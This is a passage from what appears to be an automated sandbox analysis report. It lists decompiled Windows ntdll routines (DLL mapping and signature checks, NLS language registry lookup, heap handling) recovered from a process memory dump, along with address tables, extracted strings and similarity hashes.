                                  					 *(_t125 + 0x34) = _t73;
                                  					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                  						goto L3;
                                  					}
                                  					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                  					_t124 = E0342C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                  					if(_t124 < 0) {
                                  						goto L8;
                                  					} else {
                                  						goto L3;
                                  					}
                                  				} else {
                                  					L3:
                                  					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                  						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                  						L8:
                                  						return _t124;
                                  					}
                                  					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                  						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                  							goto L5;
                                  						}
                                  						_t102 =  *0x3515780; // 0x0
                                  						if((_t102 & 0x00000003) != 0) {
                                  							E034A5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                  							_t102 =  *0x3515780; // 0x0
                                  						}
                                  						if((_t102 & 0x00000010) != 0) {
                                  							asm("int3");
                                  						}
                                  						_t124 = 0xc0000428;
                                  						goto L8;
                                  					}
                                  					L5:
                                  					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                  						goto L8;
                                  					}
                                  					_t77 = _a4 - 0x40000003;
                                  					if(_t77 == 0 || _t77 == 0x33) {
                                  						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                  						if(E03447D50() != 0) {
                                  							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  						} else {
                                  							_t82 = 0x7ffe0384;
                                  						}
                                  						_t108 = 0x7ffe0385;
                                  						if( *_t82 != 0) {
                                  							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                  								if(E03447D50() == 0) {
                                  									_t97 = 0x7ffe0385;
                                  								} else {
                                  									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                  								}
                                  								if(( *_t97 & 0x00000020) != 0) {
                                  									E034A7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                  								}
                                  							}
                                  						}
                                  						if(_a4 != 0x40000003) {
                                  							L14:
                                  							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                  							if(E03447D50() != 0) {
                                  								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  							} else {
                                  								_t87 = 0x7ffe0384;
                                  							}
                                  							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                  								if(E03447D50() != 0) {
                                  									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                  								}
                                  								if(( *_t108 & 0x00000020) != 0) {
                                  									E034A7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                  								}
                                  							}
                                  							goto L8;
                                  						} else {
                                  							_v16 = _t125 + 0x24;
                                  							_t124 = E0345A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                  							if(_t124 < 0) {
                                  								E0342B1E1(_t124, 0x1490, 0, _v16);
                                  								goto L8;
                                  							}
                                  							goto L14;
                                  						}
                                  					} else {
                                  						goto L8;
                                  					}
                                  				}
                                  			}




















                                  0x03437e4c
                                  0x03437e50
                                  0x03437e55
                                  0x03437e58
                                  0x03437e5d
                                  0x03437e71
                                  0x03437f33
                                  0x03437e77
                                  0x03437e77
                                  0x03437e79
                                  0x03437e79
                                  0x03437e7e
                                  0x03437f45
                                  0x03489848
                                  0x00000000
                                  0x03489848
                                  0x03437f4e
                                  0x03437f53
                                  0x03437f5a
                                  0x00000000
                                  0x00000000
                                  0x0348985a
                                  0x03489862
                                  0x03489866
                                  0x00000000
                                  0x0348986c
                                  0x00000000
                                  0x0348986c
                                  0x03437e84
                                  0x03437e84
                                  0x03437e8d
                                  0x03489871
                                  0x03437eb8
                                  0x03437ec0
                                  0x03437ec0
                                  0x03437e9a
                                  0x0348987e
                                  0x00000000
                                  0x00000000
                                  0x03489884
                                  0x0348988b
                                  0x034898a7
                                  0x034898ac
                                  0x034898b1
                                  0x034898b6
                                  0x034898b8
                                  0x034898b8
                                  0x034898b9
                                  0x00000000
                                  0x034898b9
                                  0x03437ea0
                                  0x03437ea7
                                  0x00000000
                                  0x00000000
                                  0x03437eac
                                  0x03437eb1
                                  0x03437ec6
                                  0x03437ed0
                                  0x034898cc
                                  0x03437ed6
                                  0x03437ed6
                                  0x03437ed6
                                  0x03437ede
                                  0x03437ee3
                                  0x034898e3
                                  0x034898f0
                                  0x03489902
                                  0x034898f2
                                  0x034898fb
                                  0x034898fb
                                  0x03489907
                                  0x0348991d
                                  0x0348991d
                                  0x03489907
                                  0x034898e3
                                  0x03437ef0
                                  0x03437f14
                                  0x03437f14
                                  0x03437f1e
                                  0x03489946
                                  0x03437f24
                                  0x03437f24
                                  0x03437f24
                                  0x03437f2c
                                  0x0348996a
                                  0x03489975
                                  0x03489975
                                  0x0348997e
                                  0x03489993
                                  0x03489993
                                  0x0348997e
                                  0x00000000
                                  0x03437ef2
                                  0x03437efc
                                  0x03437f0a
                                  0x03437f0e
                                  0x03489933
                                  0x00000000
                                  0x03489933
                                  0x00000000
                                  0x03437f0e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03437eb1

                                  Strings
                                  • LdrpCompleteMapModule, xrefs: 03489898
                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 03489891
                                  • minkernel\ntdll\ldrmap.c, xrefs: 034898A2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                  • API String ID: 0-1676968949
                                  • Opcode ID: ec102f926d90a85b87dd3eb6390a1298205eb6dc1d596d4534ed46411c27488c
                                  • Instruction ID: 1fa0589e941992b189158273ec5b50c602207d303313404f994d406158d6d7a0
                                  • Opcode Fuzzy Hash: ec102f926d90a85b87dd3eb6390a1298205eb6dc1d596d4534ed46411c27488c
                                  • Instruction Fuzzy Hash: 525103B1605B419FD721DB69C945B2ABFE4EB0A310F1809ABE8A19F7D1D730ED01CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0342E620(void* __ecx, short* __edx, short* _a4) {
                                  				char _v16;
                                  				char _v20;
                                  				intOrPtr _v24;
                                  				char* _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v44;
                                  				signed int _v48;
                                  				intOrPtr _v52;
                                  				void* _v56;
                                  				void* _v60;
                                  				char _v64;
                                  				void* _v68;
                                  				void* _v76;
                                  				void* _v84;
                                  				signed int _t59;
                                  				signed int _t74;
                                  				signed short* _t75;
                                  				signed int _t76;
                                  				signed short* _t78;
                                  				signed int _t83;
                                  				short* _t93;
                                  				signed short* _t94;
                                  				short* _t96;
                                  				void* _t97;
                                  				signed int _t99;
                                  				void* _t101;
                                  				void* _t102;
                                  
                                  				_t80 = __ecx;
                                  				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                  				_t96 = __edx;
                                  				_v44 = __edx;
                                  				_t78 = 0;
                                  				_v56 = 0;
                                  				if(__ecx == 0 || __edx == 0) {
                                  					L28:
                                  					_t97 = 0xc000000d;
                                  				} else {
                                  					_t93 = _a4;
                                  					if(_t93 == 0) {
                                  						goto L28;
                                  					}
                                  					_t78 = E0342F358(__ecx, 0xac);
                                  					if(_t78 == 0) {
                                  						_t97 = 0xc0000017;
                                  						L6:
                                  						if(_v56 != 0) {
                                  							_push(_v56);
                                  							E034695D0();
                                  						}
                                  						if(_t78 != 0) {
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                  						}
                                  						return _t97;
                                  					}
                                  					E0346FA60(_t78, 0, 0x158);
                                  					_v48 = _v48 & 0x00000000;
                                  					_t102 = _t101 + 0xc;
                                  					 *_t96 = 0;
                                  					 *_t93 = 0;
                                  					E0346BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                  					_v36 = 0x18;
                                  					_v28 =  &_v44;
                                  					_v64 = 0;
                                  					_push( &_v36);
                                  					_push(0x20019);
                                  					_v32 = 0;
                                  					_push( &_v64);
                                  					_v24 = 0x40;
                                  					_v20 = 0;
                                  					_v16 = 0;
                                  					_t97 = E03469600();
                                  					if(_t97 < 0) {
                                  						goto L6;
                                  					}
                                  					E0346BB40(0,  &_v36, L"InstallLanguageFallback");
                                  					_push(0);
                                  					_v48 = 4;
                                  					_t97 = L0342F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                  					if(_t97 >= 0) {
                                  						if(_v52 != 1) {
                                  							L17:
                                  							_t97 = 0xc0000001;
                                  							goto L6;
                                  						}
                                  						_t59 =  *_t78 & 0x0000ffff;
                                  						_t94 = _t78;
                                  						_t83 = _t59;
                                  						if(_t59 == 0) {
                                  							L19:
                                  							if(_t83 == 0) {
                                  								L23:
                                  								E0346BB40(_t83, _t102 + 0x24, _t78);
                                  								if(L034343C0( &_v48,  &_v64) == 0) {
                                  									goto L17;
                                  								}
                                  								_t84 = _v48;
                                  								 *_v48 = _v56;
                                  								if( *_t94 != 0) {
                                  									E0346BB40(_t84, _t102 + 0x24, _t94);
                                  									if(L034343C0( &_v48,  &_v64) != 0) {
                                  										 *_a4 = _v56;
                                  									} else {
                                  										_t97 = 0xc0000001;
                                  										 *_v48 = 0;
                                  									}
                                  								}
                                  								goto L6;
                                  							}
                                  							_t83 = _t83 & 0x0000ffff;
                                  							while(_t83 == 0x20) {
                                  								_t94 =  &(_t94[1]);
                                  								_t74 =  *_t94 & 0x0000ffff;
                                  								_t83 = _t74;
                                  								if(_t74 != 0) {
                                  									continue;
                                  								}
                                  								goto L23;
                                  							}
                                  							goto L23;
                                  						} else {
                                  							goto L14;
                                  						}
                                  						while(1) {
                                  							L14:
                                  							_t27 =  &(_t94[1]); // 0x2
                                  							_t75 = _t27;
                                  							if(_t83 == 0x2c) {
                                  								break;
                                  							}
                                  							_t94 = _t75;
                                  							_t76 =  *_t94 & 0x0000ffff;
                                  							_t83 = _t76;
                                  							if(_t76 != 0) {
                                  								continue;
                                  							}
                                  							goto L23;
                                  						}
                                  						 *_t94 = 0;
                                  						_t94 = _t75;
                                  						_t83 =  *_t75 & 0x0000ffff;
                                  						goto L19;
                                  					}
                                  				}
                                  			}































                                  0x0342e620
                                  0x0342e628
                                  0x0342e62f
                                  0x0342e631
                                  0x0342e635
                                  0x0342e637
                                  0x0342e63e
                                  0x03485503
                                  0x03485503
                                  0x0342e64c
                                  0x0342e64c
                                  0x0342e651
                                  0x00000000
                                  0x00000000
                                  0x0342e661
                                  0x0342e665
                                  0x0348542a
                                  0x0342e715
                                  0x0342e71a
                                  0x0342e71c
                                  0x0342e720
                                  0x0342e720
                                  0x0342e727
                                  0x0342e736
                                  0x0342e736
                                  0x0342e743
                                  0x0342e743
                                  0x0342e673
                                  0x0342e678
                                  0x0342e67d
                                  0x0342e682
                                  0x0342e685
                                  0x0342e692
                                  0x0342e69b
                                  0x0342e6a3
                                  0x0342e6ad
                                  0x0342e6b1
                                  0x0342e6b2
                                  0x0342e6bb
                                  0x0342e6bf
                                  0x0342e6c0
                                  0x0342e6c8
                                  0x0342e6cc
                                  0x0342e6d5
                                  0x0342e6d9
                                  0x00000000
                                  0x00000000
                                  0x0342e6e5
                                  0x0342e6ea
                                  0x0342e6f9
                                  0x0342e70b
                                  0x0342e70f
                                  0x03485439
                                  0x0348545e
                                  0x0348545e
                                  0x00000000
                                  0x0348545e
                                  0x0348543b
                                  0x0348543e
                                  0x03485440
                                  0x03485445
                                  0x03485472
                                  0x03485475
                                  0x0348548d
                                  0x03485493
                                  0x034854a9
                                  0x00000000
                                  0x00000000
                                  0x034854ab
                                  0x034854b4
                                  0x034854bc
                                  0x034854c8
                                  0x034854de
                                  0x034854fb
                                  0x034854e0
                                  0x034854e6
                                  0x034854eb
                                  0x034854eb
                                  0x034854de
                                  0x00000000
                                  0x034854bc
                                  0x03485477
                                  0x0348547a
                                  0x03485480
                                  0x03485483
                                  0x03485486
                                  0x0348548b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0348548b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03485447
                                  0x03485447
                                  0x03485447
                                  0x03485447
                                  0x0348544e
                                  0x00000000
                                  0x00000000
                                  0x03485450
                                  0x03485452
                                  0x03485455
                                  0x0348545a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0348545c
                                  0x0348546a
                                  0x0348546d
                                  0x0348546f
                                  0x00000000
                                  0x0348546f
                                  0x0342e70f

                                  Strings
                                  • InstallLanguageFallback, xrefs: 0342E6DB
                                  • @, xrefs: 0342E6C0
                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0342E68C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                  • API String ID: 0-1757540487
                                  • Opcode ID: fdef653aff535afeff1d9711545e87063d4dd30cf6a0d03e725be997e6b5849c
                                  • Instruction ID: 06511014324a2fa514c8aa7856a7bbf6e4cdb2cfc3f7c81a61fba7cc7f1bc9e8
                                  • Opcode Fuzzy Hash: fdef653aff535afeff1d9711545e87063d4dd30cf6a0d03e725be997e6b5849c
                                  • Instruction Fuzzy Hash: 2951C0765043159BC710EF26C440BAFB3E8AF89A14F4909AFF995EF340E734D94487AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E034EE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                  				signed int _v20;
                                  				char _v24;
                                  				signed int _v40;
                                  				char _v44;
                                  				intOrPtr _v48;
                                  				signed int _v52;
                                  				unsigned int _v56;
                                  				char _v60;
                                  				signed int _v64;
                                  				char _v68;
                                  				signed int _v72;
                                  				void* __ebx;
                                  				void* __edi;
                                  				char _t87;
                                  				signed int _t90;
                                  				signed int _t94;
                                  				signed int _t100;
                                  				intOrPtr* _t113;
                                  				signed int _t122;
                                  				void* _t132;
                                  				void* _t135;
                                  				signed int _t139;
                                  				signed int* _t141;
                                  				signed int _t146;
                                  				signed int _t147;
                                  				void* _t153;
                                  				signed int _t155;
                                  				signed int _t159;
                                  				char _t166;
                                  				void* _t172;
                                  				void* _t176;
                                  				signed int _t177;
                                  				intOrPtr* _t179;
                                  
                                  				_t179 = __ecx;
                                  				_v48 = __edx;
                                  				_v68 = 0;
                                  				_v72 = 0;
                                  				_push(__ecx[1]);
                                  				_push( *__ecx);
                                  				_push(0);
                                  				_t153 = 0x14;
                                  				_t135 = _t153;
                                  				_t132 = E034EBBBB(_t135, _t153);
                                  				if(_t132 == 0) {
                                  					_t166 = _v68;
                                  					goto L43;
                                  				} else {
                                  					_t155 = 0;
                                  					_v52 = 0;
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  					_v56 = __ecx[1];
                                  					if( *__ecx >> 8 < 2) {
                                  						_t155 = 1;
                                  						_v52 = 1;
                                  					}
                                  					_t139 = _a4;
                                  					_t87 = (_t155 << 0xc) + _t139;
                                  					_v60 = _t87;
                                  					if(_t87 < _t139) {
                                  						L11:
                                  						_t166 = _v68;
                                  						L12:
                                  						if(_t132 != 0) {
                                  							E034EBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                  						}
                                  						L43:
                                  						if(_v72 != 0) {
                                  							_push( *((intOrPtr*)(_t179 + 4)));
                                  							_push( *_t179);
                                  							_push(0x8000);
                                  							E034EAFDE( &_v72,  &_v60);
                                  						}
                                  						L46:
                                  						return _t166;
                                  					}
                                  					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                  					asm("sbb edi, edi");
                                  					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                  					if(_t90 != 0) {
                                  						_push(0);
                                  						_push(0x14);
                                  						_push( &_v44);
                                  						_push(3);
                                  						_push(_t179);
                                  						_push(0xffffffff);
                                  						if(E03469730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                  							_push(_t139);
                                  							E034EA80D(_t179, 1, _v40, 0);
                                  							_t172 = 4;
                                  						}
                                  					}
                                  					_t141 =  &_v72;
                                  					if(E034EA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                  						_v64 = _a4;
                                  						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                  						asm("sbb edi, edi");
                                  						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                  						if(_t94 != 0) {
                                  							_push(0);
                                  							_push(0x14);
                                  							_push( &_v24);
                                  							_push(3);
                                  							_push(_t179);
                                  							_push(0xffffffff);
                                  							if(E03469730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                  								_push(_t141);
                                  								E034EA80D(_t179, 1, _v20, 0);
                                  								_t176 = 4;
                                  							}
                                  						}
                                  						if(E034EA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                  							goto L11;
                                  						} else {
                                  							_t177 = _v64;
                                  							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                  							_t100 = _v52 + _v52;
                                  							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                  							 *(_t132 + 0x10) = _t146;
                                  							asm("bsf eax, [esp+0x18]");
                                  							_v52 = _t100;
                                  							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                  							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                  							_t47 =  &_a8;
                                  							 *_t47 = _a8 & 0x00000001;
                                  							if( *_t47 == 0) {
                                  								E03442280(_t179 + 0x30, _t179 + 0x30);
                                  							}
                                  							_t147 =  *(_t179 + 0x34);
                                  							_t159 =  *(_t179 + 0x38) & 1;
                                  							_v68 = 0;
                                  							if(_t147 == 0) {
                                  								L35:
                                  								E0343B090(_t179 + 0x34, _t147, _v68, _t132);
                                  								if(_a8 == 0) {
                                  									E0343FFB0(_t132, _t177, _t179 + 0x30);
                                  								}
                                  								asm("lock xadd [eax], ecx");
                                  								asm("lock xadd [eax], edx");
                                  								_t132 = 0;
                                  								_v72 = _v72 & 0;
                                  								_v68 = _v72;
                                  								if(E03447D50() == 0) {
                                  									_t113 = 0x7ffe0388;
                                  								} else {
                                  									_t177 = _v64;
                                  									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                  								}
                                  								if( *_t113 == _t132) {
                                  									_t166 = _v68;
                                  									goto L46;
                                  								} else {
                                  									_t166 = _v68;
                                  									E034DFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                  									goto L12;
                                  								}
                                  							} else {
                                  								L23:
                                  								while(1) {
                                  									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                  										_t122 =  *_t147;
                                  										if(_t159 == 0) {
                                  											L32:
                                  											if(_t122 == 0) {
                                  												L34:
                                  												_v68 = 0;
                                  												goto L35;
                                  											}
                                  											L33:
                                  											_t147 = _t122;
                                  											continue;
                                  										}
                                  										if(_t122 == 0) {
                                  											goto L34;
                                  										}
                                  										_t122 = _t122 ^ _t147;
                                  										goto L32;
                                  									}
                                  									_t122 =  *(_t147 + 4);
                                  									if(_t159 == 0) {
                                  										L27:
                                  										if(_t122 != 0) {
                                  											goto L33;
                                  										}
                                  										L28:
                                  										_v68 = 1;
                                  										goto L35;
                                  									}
                                  									if(_t122 == 0) {
                                  										goto L28;
                                  									}
                                  									_t122 = _t122 ^ _t147;
                                  									goto L27;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					_v72 = _v72 & 0x00000000;
                                  					goto L11;
                                  				}
                                  			}




































                                  0x034ee547
                                  0x034ee549
                                  0x034ee54f
                                  0x034ee553
                                  0x034ee557
                                  0x034ee55a
                                  0x034ee55c
                                  0x034ee55f
                                  0x034ee561
                                  0x034ee567
                                  0x034ee56b
                                  0x034ee7e2
                                  0x00000000
                                  0x034ee571
                                  0x034ee575
                                  0x034ee577
                                  0x034ee57b
                                  0x034ee57c
                                  0x034ee57d
                                  0x034ee57e
                                  0x034ee57f
                                  0x034ee588
                                  0x034ee58f
                                  0x034ee591
                                  0x034ee592
                                  0x034ee592
                                  0x034ee596
                                  0x034ee59e
                                  0x034ee5a0
                                  0x034ee5a6
                                  0x034ee61d
                                  0x034ee61d
                                  0x034ee621
                                  0x034ee623
                                  0x034ee630
                                  0x034ee630
                                  0x034ee7e6
                                  0x034ee7eb
                                  0x034ee7ed
                                  0x034ee7f4
                                  0x034ee7fa
                                  0x034ee7ff
                                  0x034ee7ff
                                  0x034ee80a
                                  0x034ee812
                                  0x034ee812
                                  0x034ee5ab
                                  0x034ee5b4
                                  0x034ee5b9
                                  0x034ee5be
                                  0x034ee5c0
                                  0x034ee5c2
                                  0x034ee5c8
                                  0x034ee5c9
                                  0x034ee5cb
                                  0x034ee5cc
                                  0x034ee5d5
                                  0x034ee5e4
                                  0x034ee5f1
                                  0x034ee5f8
                                  0x034ee5f8
                                  0x034ee5d5
                                  0x034ee602
                                  0x034ee616
                                  0x034ee63d
                                  0x034ee644
                                  0x034ee64d
                                  0x034ee652
                                  0x034ee657
                                  0x034ee659
                                  0x034ee65b
                                  0x034ee661
                                  0x034ee662
                                  0x034ee664
                                  0x034ee665
                                  0x034ee66e
                                  0x034ee67d
                                  0x034ee68a
                                  0x034ee691
                                  0x034ee691
                                  0x034ee66e
                                  0x034ee6b0
                                  0x00000000
                                  0x034ee6b6
                                  0x034ee6bd
                                  0x034ee6c7
                                  0x034ee6d7
                                  0x034ee6d9
                                  0x034ee6db
                                  0x034ee6de
                                  0x034ee6e3
                                  0x034ee6f3
                                  0x034ee6fc
                                  0x034ee700
                                  0x034ee700
                                  0x034ee704
                                  0x034ee70a
                                  0x034ee70a
                                  0x034ee713
                                  0x034ee716
                                  0x034ee719
                                  0x034ee720
                                  0x034ee761
                                  0x034ee76b
                                  0x034ee774
                                  0x034ee77a
                                  0x034ee77a
                                  0x034ee78a
                                  0x034ee791
                                  0x034ee799
                                  0x034ee79b
                                  0x034ee79f
                                  0x034ee7aa
                                  0x034ee7c0
                                  0x034ee7ac
                                  0x034ee7b2
                                  0x034ee7b9
                                  0x034ee7b9
                                  0x034ee7c7
                                  0x034ee806
                                  0x00000000
                                  0x034ee7c9
                                  0x034ee7d1
                                  0x034ee7d8
                                  0x00000000
                                  0x034ee7d8
                                  0x00000000
                                  0x00000000
                                  0x034ee722
                                  0x034ee72e
                                  0x034ee748
                                  0x034ee74c
                                  0x034ee754
                                  0x034ee756
                                  0x034ee75c
                                  0x034ee75c
                                  0x00000000
                                  0x034ee75c
                                  0x034ee758
                                  0x034ee758
                                  0x00000000
                                  0x034ee758
                                  0x034ee750
                                  0x00000000
                                  0x00000000
                                  0x034ee752
                                  0x00000000
                                  0x034ee752
                                  0x034ee730
                                  0x034ee735
                                  0x034ee73d
                                  0x034ee73f
                                  0x00000000
                                  0x00000000
                                  0x034ee741
                                  0x034ee741
                                  0x00000000
                                  0x034ee741
                                  0x034ee739
                                  0x00000000
                                  0x00000000
                                  0x034ee73b
                                  0x00000000
                                  0x034ee73b
                                  0x034ee722
                                  0x034ee720
                                  0x034ee6b0
                                  0x034ee618
                                  0x00000000
                                  0x034ee618

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction ID: 4b0f5d20acc9d4528b7095ce84a72f78985bcaf0b7f90a78dab1d8d416b95fac
                                  • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction Fuzzy Hash: 8991BF316043419FE724CE25C840B2BB7E6BF84715F18892EF9A9CF290E774E844CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E034A51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed short* _t63;
                                  				signed int _t64;
                                  				signed int _t65;
                                  				signed int _t67;
                                  				intOrPtr _t74;
                                  				intOrPtr _t84;
                                  				intOrPtr _t88;
                                  				intOrPtr _t94;
                                  				void* _t100;
                                  				void* _t103;
                                  				intOrPtr _t105;
                                  				signed int _t106;
                                  				short* _t108;
                                  				signed int _t110;
                                  				signed int _t113;
                                  				signed int* _t115;
                                  				signed short* _t117;
                                  				void* _t118;
                                  				void* _t119;
                                  
                                  				_push(0x80);
                                  				_push(0x35005f0);
                                  				E0347D0E8(__ebx, __edi, __esi);
                                  				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                  				_t115 =  *(_t118 + 0xc);
                                  				 *(_t118 - 0x7c) = _t115;
                                  				 *((char*)(_t118 - 0x65)) = 0;
                                  				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                  				_t113 = 0;
                                  				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                  				 *((intOrPtr*)(_t118 - 4)) = 0;
                                  				_t100 = __ecx;
                                  				if(_t100 == 0) {
                                  					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                  					E0343EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                  					 *((char*)(_t118 - 0x65)) = 1;
                                  					_t63 =  *(_t118 - 0x90);
                                  					_t101 = _t63[2];
                                  					_t64 =  *_t63 & 0x0000ffff;
                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                  					L20:
                                  					_t65 = _t64 >> 1;
                                  					L21:
                                  					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                  					if(_t108 == 0) {
                                  						L27:
                                  						 *_t115 = _t65 + 1;
                                  						_t67 = 0xc0000023;
                                  						L28:
                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                  						L29:
                                  						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                  						E034A53CA(0);
                                  						return E0347D130(0, _t113, _t115);
                                  					}
                                  					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                  						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                  							 *_t108 = 0;
                                  						}
                                  						goto L27;
                                  					}
                                  					 *_t115 = _t65;
                                  					_t115 = _t65 + _t65;
                                  					E0346F3E0(_t108, _t101, _t115);
                                  					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                  					_t67 = 0;
                                  					goto L28;
                                  				}
                                  				_t103 = _t100 - 1;
                                  				if(_t103 == 0) {
                                  					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                  					_t74 = E03443690(1, _t117, 0x3401810, _t118 - 0x74);
                                  					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                  					_t101 = _t117[2];
                                  					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                  					if(_t74 < 0) {
                                  						_t64 =  *_t117 & 0x0000ffff;
                                  						_t115 =  *(_t118 - 0x7c);
                                  						goto L20;
                                  					}
                                  					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                  					_t115 =  *(_t118 - 0x7c);
                                  					goto L21;
                                  				}
                                  				if(_t103 == 1) {
                                  					_t105 = 4;
                                  					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                  					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                  					_push(_t118 - 0x70);
                                  					_push(0);
                                  					_push(0);
                                  					_push(_t105);
                                  					_push(_t118 - 0x78);
                                  					_push(0x6b);
                                  					 *((intOrPtr*)(_t118 - 0x64)) = E0346AA90();
                                  					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                  					_t113 = L03444620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                  					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                  					if(_t113 != 0) {
                                  						_push(_t118 - 0x70);
                                  						_push( *((intOrPtr*)(_t118 - 0x70)));
                                  						_push(_t113);
                                  						_push(4);
                                  						_push(_t118 - 0x78);
                                  						_push(0x6b);
                                  						_t84 = E0346AA90();
                                  						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                  						if(_t84 < 0) {
                                  							goto L29;
                                  						}
                                  						_t110 = 0;
                                  						_t106 = 0;
                                  						while(1) {
